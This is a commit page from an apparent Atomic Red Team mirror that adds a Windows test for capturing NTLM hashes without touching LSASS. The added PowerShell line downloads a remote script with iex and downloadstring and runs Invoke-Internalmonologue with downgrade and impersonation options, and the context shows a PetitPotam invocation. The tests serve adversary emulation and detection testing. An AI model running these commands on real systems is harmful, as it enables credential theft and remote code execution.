security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update T1187.yaml (#1960)

Browse Source 
Added PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
This commit is contained in:
tlor89
2022-05-12 17:46:53 -05:00
committed by GitHub
parent e7611b652c
commit 2fd693ca91
1 changed files with 9 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1187/T1187.yaml
+9
View File
@@ -39,3 +39,12 @@ atomic_tests:
command: |
& "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
Write-Host "End of PetitPotam attack"
- name: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
description: PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"
name: powershell